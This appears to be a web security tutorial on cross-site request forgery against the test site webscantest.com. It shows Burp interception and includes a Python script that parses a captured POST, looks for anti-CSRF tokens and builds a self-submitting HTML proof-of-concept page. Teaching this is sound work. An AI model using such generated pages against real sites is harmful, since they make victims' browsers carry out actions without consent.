CSRF – An End-to-End Example

Let's take another look at a CSRF vulnerability on webscantest.com. Here's the form we'll be testing:

Simple enough. Fire up the Burp proxy, make sure Intercept is on, and fill in the form with a recognizable test value:

As a sidenote, cyan is really cool: in the subtractive color system it is a primary color, and it can be created by removing red from white light. Let's submit the form and then check back with Burp to see the intercepted request:

OK, noting the important information in the HTTP request ...
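To make the "note the important information" step concrete, here is an added example (my own code, not from the book or from webscantest.com) that takes the kind of raw POST Burp shows after the form is submitted, checks whether anything other than the session cookie ties the request to the user, and turns it into a self-submitting CSRF proof-of-concept page. The request text, host path, cookie and field names are constructed for illustration; the real form's path and fields are whatever Burp shows you.

```python
"""Turn an intercepted form POST (as seen in Burp) into a CSRF proof of concept."""
import html
from urllib.parse import parse_qsl

# Constructed sample of the shape Burp shows after the form is submitted.
# The path, cookie and field names are hypothetical, not taken from the book.
SAMPLE_REQUEST = (
    "POST /example/profile.php HTTP/1.1\r\n"
    "Host: www.webscantest.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: PHPSESSID=abc123\r\n"
    "Content-Length: 35\r\n"
    "\r\n"
    "name=Cyan&color=%2300FFFF&submit=Go"
)

# Parameter and header names that usually mean a CSRF defence is in play.
TOKEN_PARAM_HINTS = ("csrf", "token", "nonce", "authenticity", "_state")
TOKEN_HEADER_HINTS = ("x-csrf-token", "x-xsrf-token", "x-requested-with")


def parse_raw_request(raw):
    """Split a raw HTTP/1.1 request into method, path, headers and form params."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # keep_blank_values so an empty hidden field still shows up in the PoC
    params = parse_qsl(body, keep_blank_values=True)
    return {"method": method, "path": path, "headers": headers, "params": params}


def csrf_defences(req):
    """List request-side indicators of a CSRF defence an attacker would have to defeat.

    An empty list means only the session cookie authenticates the request, which
    is exactly the situation a cross-site <form> can exploit.
    """
    found = []
    for name, _ in req["params"]:
        if any(hint in name.lower() for hint in TOKEN_PARAM_HINTS):
            found.append("param:" + name)
    for hdr in req["headers"]:
        if hdr in TOKEN_HEADER_HINTS:
            found.append("header:" + hdr)
    ctype = req["headers"].get("content-type", "")
    if ctype.startswith("application/json"):
        # A plain HTML form cannot send application/json, so this is a hurdle.
        found.append("content-type:json")
    return found


def build_csrf_poc(req, scheme="http"):
    """Build a self-submitting HTML page that replays the request from the victim's browser.

    The browser attaches the victim's cookies itself; if the server accepts the
    replayed request, the form is CSRF-able.
    """
    action = "%s://%s%s" % (scheme, req["headers"]["host"], req["path"])
    inputs = ""
    for name, value in req["params"]:
        inputs += '    <input type="hidden" name="%s" value="%s">\n' % (
            html.escape(name, quote=True),
            html.escape(value, quote=True),
        )
    page = "<html><body>\n"
    page += '  <form id="csrf" action="%s" method="%s">\n' % (
        html.escape(action, quote=True),
        req["method"],
    )
    page += inputs
    page += "  </form>\n"
    page += '  <script>document.getElementById("csrf").submit();</script>\n'
    page += "</body></html>\n"
    return page


if __name__ == "__main__":
    request = parse_raw_request(SAMPLE_REQUEST)
    print("defences seen:", csrf_defences(request) or "none")
    print(build_csrf_poc(request))
```

Host the generated page anywhere and open it in a browser that already holds a session on the target; if the change lands, the form has no working CSRF protection. A token in the parameter list or a custom header is not proof the defence works, only that there is something to test next (for example, whether the server actually validates the token's value).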
